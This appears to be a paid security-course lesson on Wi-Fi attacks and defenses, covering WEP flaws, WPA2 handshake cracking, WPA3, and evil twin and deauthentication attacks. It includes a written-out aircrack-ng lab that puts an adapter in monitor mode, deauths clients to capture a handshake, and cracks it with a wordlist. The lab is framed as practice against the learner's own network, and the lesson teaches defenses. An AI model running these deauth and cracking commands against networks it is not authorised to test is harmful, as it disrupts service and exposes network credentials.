After this lesson, you will be able to: Explain 802.11 basics, why WEP is broken, WPA2's 4-way handshake and offline dictionary attacks, what WPA3 improves, evil twin and deauthentication attacks, and the defenses; capture and attack a WPA2 handshake in a lab you own.
Wi-Fi is a shared radio medium, which creates attacks wired networks do not have. This lesson covers 802.11 basics, the brokenness of WEP, WPA2's handshake and offline cracking, WPA3's improvements, evil twin and deauth attacks, and an aircrack-ng lab against a network you own.
Wi-Fi devices find networks via beacon frames (the access point advertising its SSID) and probe requests (clients looking for known networks), then associate to join. Management frames coordinate all of this, and in WPA2 and earlier they are unauthenticated, which is the root of deauthentication attacks. Understanding beacons, probes, and association explains both how you connect and how attacks manipulate that process.
WEP was the original Wi-Fi encryption and is fatally flawed: its initialization vectors (IVs) are short and reused, so capturing enough traffic lets an attacker recover the key in minutes. There is no safe way to use WEP; if you ever see it, treat the network as open. It exists in this lesson only so you recognize and retire it.
WPA2-PSK protects the network with a pre-shared key and establishes session keys through a 4-way handshake. An attacker who captures that handshake (or just the PMKID from a single frame) can run an offline dictionary or brute-force attack against it: each guess is tested against the captured handshake without touching the network. This is why a strong, unique, long Wi-Fi passphrase matters; a weak one falls in a wordlist.
WPA3 replaces the PSK exchange with SAE (Simultaneous Authentication of Equals, a password-authenticated key exchange) so an attacker cannot run the same offline dictionary attack against a captured handshake, and it adds forward secrecy. Evil twin attacks create a rogue access point with the same SSID as a legitimate network and lure clients to it, often by sending deauthentication frames to knock clients off the real AP first. Because WPA2 management frames are unauthenticated, anyone can forge a deauth and disconnect clients at will, which is also how attackers force a handshake capture.
Requires a monitor-mode adapter and your own AP.
1. Put the adapter in monitor mode: airmon-ng start wlan0.
2. Find your network and channel: airodump-ng wlan0mon.
3. Capture the handshake on your AP's channel: airodump-ng -c <ch> --bssid <your_bssid> -w cap wlan0mon.
4. Force a reconnection to capture the handshake: aireplay-ng --deauth 5 -a <your_bssid> wlan0mon.
5. Crack the captured handshake against a wordlist (use a password you set): aircrack-ng -w rockyou.txt cap-01.cap.
6. Observe that a weak password cracks quickly and a long random one does not. Then read the defenses.
Use WPA3 where supported; it removes the offline-dictionary attack. Enable 802.11w (Protected Management Frames) to authenticate management frames and stop deauth/evil-twin tricks. For organizations, use WPA2/WPA3-Enterprise (EAP) with per-user credentials instead of a shared PSK, so one leaked password does not expose everyone. Monitor for deauth floods and rogue APs. And regardless of protocol, use a long, unique passphrase that no wordlist contains.
Pick one.
Using an adapter that does not support monitor mode and wondering why nothing captures. Attacking a neighbor's network and committing a crime. Believing WPA2 is unbreakable (it is the passphrase, plus offline attacks, that decide). Forgetting 802.11w, leaving deauth attacks trivial. Assuming hiding the SSID is security (it is not; probes reveal it). Reusing one PSK across an entire organization instead of Enterprise EAP.
Sign in and purchase access to unlock this lesson.